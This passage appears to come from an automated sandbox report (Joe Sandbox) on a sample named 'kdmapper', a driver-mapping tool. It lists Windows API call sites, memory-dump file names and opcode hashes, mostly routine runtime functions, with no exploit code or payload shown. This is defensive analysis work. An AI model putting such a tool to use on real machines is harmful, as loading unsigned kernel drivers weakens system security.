                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E51F
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: (c$2c
                                                                                                                                                                          • API String ID: 1269201914-1934866258
                                                                                                                                                                          • Opcode ID: 94706256e87af5558d1fbb4e3f3372ce9edce69b4e57012ab72f9ad990aca067
                                                                                                                                                                          • Instruction ID: 67cd0f8a411ec80a8d01bdee073ae741db332fe53e776ad2a7c2d6ea260ea7c0
                                                                                                                                                                          • Opcode Fuzzy Hash: 94706256e87af5558d1fbb4e3f3372ce9edce69b4e57012ab72f9ad990aca067
                                                                                                                                                                          • Instruction Fuzzy Hash: 0DB012C1698500BD314465481C02D3B050FC0C1F35B30412EF805C01C0E8420D4505B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0062D343,00000001,?,?,?,00000000,0063551D,?,?,?), ref: 00629F9E
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0063551D,?,?,?,?,?,00634FC7,?), ref: 00629FE5
                                                                                                                                                                          • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0062D343,00000001,?,?), ref: 0062A011
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite$Handle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4209713984-0
                                                                                                                                                                          • Opcode ID: 755c51f4aaf543d0745962dc89ae59e5b5be16765e1f5db8564a06160ebe4625
                                                                                                                                                                          • Instruction ID: 57b05acddf4a6ff86ea23f543e284bb63c4a31f6ca352c03c6c2fb261928e6cc
                                                                                                                                                                          • Opcode Fuzzy Hash: 755c51f4aaf543d0745962dc89ae59e5b5be16765e1f5db8564a06160ebe4625
                                                                                                                                                                          • Instruction Fuzzy Hash: 7031A031208725AFDB14CF20E918BAEB7A7EB84B55F04491DF5819B390C775AD48CFA2
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0062C27E: _wcslen.LIBCMT ref: 0062C284
                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A2D9
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A30C
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A329
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2260680371-0
                                                                                                                                                                          • Opcode ID: 57c44e34b8fe87c8a70e246953eb84633838baf7379c1db78a916ef48adec128
                                                                                                                                                                          • Instruction ID: ca6bfe7c9ee9969cce0b5c2cc94ad6eb6763c0202f1d4de683bc773537946a9b
                                                                                                                                                                          • Opcode Fuzzy Hash: 57c44e34b8fe87c8a70e246953eb84633838baf7379c1db78a916ef48adec128
                                                                                                                                                                          • Instruction Fuzzy Hash: DC019231101B30ABEF21EAF56D09BED224A9F09781F044458F901E6281DB94DA818EB6
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0064B8B8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Info
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                                                                          • Opcode ID: 46f3502b8baabc08a4bd5dc68cae85cb803ec0103edaa0e771b943e97dcee3c0
                                                                                                                                                                          • Instruction ID: 8e458692cc8dd19834fad18865c9ab6d4cdd8b53418d4c13eeebebeee8479194
                                                                                                                                                                          • Opcode Fuzzy Hash: 46f3502b8baabc08a4bd5dc68cae85cb803ec0103edaa0e771b943e97dcee3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: AD41C87090439CAEDB218E64CC84BE6BBABEB56304F1414EDE59A86242D335DA45DF60
                                                                                                                                                                          APIs
                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0064AFDD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String
                                                                                                                                                                          • String ID: LCMapStringEx
                                                                                                                                                                          • API String ID: 2568140703-3893581201
                                                                                                                                                                          • Opcode ID: a2a37a114e95782fdcccda765b6466f3de201a79690815117d8acba7268a8533
                                                                                                                                                                          • Instruction ID: d3cf8d80be18fb52c0877299c5c88031856ab5907301ed35ab1b19a313a7386a
                                                                                                                                                                          • Opcode Fuzzy Hash: a2a37a114e95782fdcccda765b6466f3de201a79690815117d8acba7268a8533
                                                                                                                                                                          • Instruction Fuzzy Hash: A6014832544219BBCF029F90EC02DEE7F67EF08751F014158FE1826260CA328A31EB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0064A56F), ref: 0064AF55
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                          • String ID: InitializeCriticalSectionEx
                                                                                                                                                                          • API String ID: 2593887523-3084827643
                                                                                                                                                                          • Opcode ID: 5634e93ac9fc9215c40bb64b676f3426ddc35797677f054cf0c7b48e2303a126
                                                                                                                                                                          • Instruction ID: c3ac732f4239a2128ce937c0d148dab39b67c1a018a667f83f61329996ee598d
                                                                                                                                                                          • Opcode Fuzzy Hash: 5634e93ac9fc9215c40bb64b676f3426ddc35797677f054cf0c7b48e2303a126
                                                                                                                                                                          • Instruction Fuzzy Hash: C0F0B431A85218BBCF129F50DC02C9DBF63EF04B52F014058FC0956260DA315E14DB95
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Alloc
                                                                                                                                                                          • String ID: FlsAlloc
                                                                                                                                                                          • API String ID: 2773662609-671089009
                                                                                                                                                                          • Opcode ID: ad5e0444b30bdc65d86bf7750a88316c7087f3ca7ff27412068a1fa87b087db2
                                                                                                                                                                          • Instruction ID: 5e2c11a7fa3a443cbf7fd73132584e3d747a9de233074f4b0dc03ea84db1ba5b
                                                                                                                                                                          • Opcode Fuzzy Hash: ad5e0444b30bdc65d86bf7750a88316c7087f3ca7ff27412068a1fa87b087db2
                                                                                                                                                                          • Instruction Fuzzy Hash: 13E0E531A85318BBC711EBA5EC0296EBB57DF04B22F020199FC0597340CD715F4196EA
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 2f21c3c08c6ded9105466be6cd23036d2b2fc669850db592383d6e909f6007c0
                                                                                                                                                                          • Instruction ID: 253fd0a035e4182431cdd9cee52141fdd3f44931ad048532763fd0470309a7b8
                                                                                                                                                                          • Opcode Fuzzy Hash: 2f21c3c08c6ded9105466be6cd23036d2b2fc669850db592383d6e909f6007c0
                                                                                                                                                                          • Instruction Fuzzy Hash: ACB012E925C201EC714461891C06C37010FC4C0F21B30413EFC06C01C0F8516C0506B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: dbe3841494251c9f5a12820487c6d0a6eed74e49f6be7d52cbda8e62ae83f44f
                                                                                                                                                                          • Instruction ID: 944fad6cc1a4ff88afd5f45f08ec2d30157ff8b814ee5155997126282a8666e7
                                                                                                                                                                          • Opcode Fuzzy Hash: dbe3841494251c9f5a12820487c6d0a6eed74e49f6be7d52cbda8e62ae83f44f
                                                                                                                                                                          • Instruction Fuzzy Hash: 33B012D5258101EC314466451C06C37010FC4C1F21B30C13EFC06C02C0E851AC0906B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 70ad7a69acfa4c9345d500b4bee305a04980de1ae3e50b5540aa9142d8988c3d
                                                                                                                                                                          • Instruction ID: 2d708a65183866c18c2707abfcab41f91b1bd50fa52bb2426685e2732a32b885
                                                                                                                                                                          • Opcode Fuzzy Hash: 70ad7a69acfa4c9345d500b4bee305a04980de1ae3e50b5540aa9142d8988c3d
                                                                                                                                                                          • Instruction Fuzzy Hash: F8B012E9258201FC310421851C06C37010FC4C1F21B30853EFC02C04C0F851AC0504B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 66b08d11799adcf53f60caa791c958e68eb338223e2618552f42aa446691568a
                                                                                                                                                                          • Instruction ID: 905804acdf3431815e4b0e273919df47dfe2591b829dffbca5180926ff5f61bc
                                                                                                                                                                          • Opcode Fuzzy Hash: 66b08d11799adcf53f60caa791c958e68eb338223e2618552f42aa446691568a
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DB012D5269141EC314461851C06C37014FC8C0F21F30413EFC07C01C0E8516C0505B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 28646c81d8ad81a5512ed5942f03c4804d4b3b634b947bce5a3988873fa751e5
                                                                                                                                                                          • Instruction ID: 3f0d67255a6fd47fbb47d356a9e3a7068d117c757edc5df1eacfff127f387c5e
                                                                                                                                                                          • Opcode Fuzzy Hash: 28646c81d8ad81a5512ed5942f03c4804d4b3b634b947bce5a3988873fa751e5
                                                                                                                                                                          • Instruction Fuzzy Hash: F5B012D5258101EC3144A1551D06C37014FC4C6F21B30813EFC06C01C0E851AC0505B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 9758032c5e37f87d3e8703b2f4631e2636bf9b444792aad902fe8232bd517540
                                                                                                                                                                          • Instruction ID: ba23957c32334607ac6c5684fd210e29d7a28012790595578ff0df87ad0516c7
                                                                                                                                                                          • Opcode Fuzzy Hash: 9758032c5e37f87d3e8703b2f4631e2636bf9b444792aad902fe8232bd517540
                                                                                                                                                                          • Instruction Fuzzy Hash: 00B012D5259141EC314461451C06C37010FC4C1F21F30813EFC06C01C0E851AC0505B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: ab499ef87bdad258fcd5305aa6ecffdf79a23f67b0cc521bfa178aa66063917d
                                                                                                                                                                          • Instruction ID: bddab4c8fe04095f4262c9d24343e5fb8fcfb29d6ad7323e0852e29544e0bd52
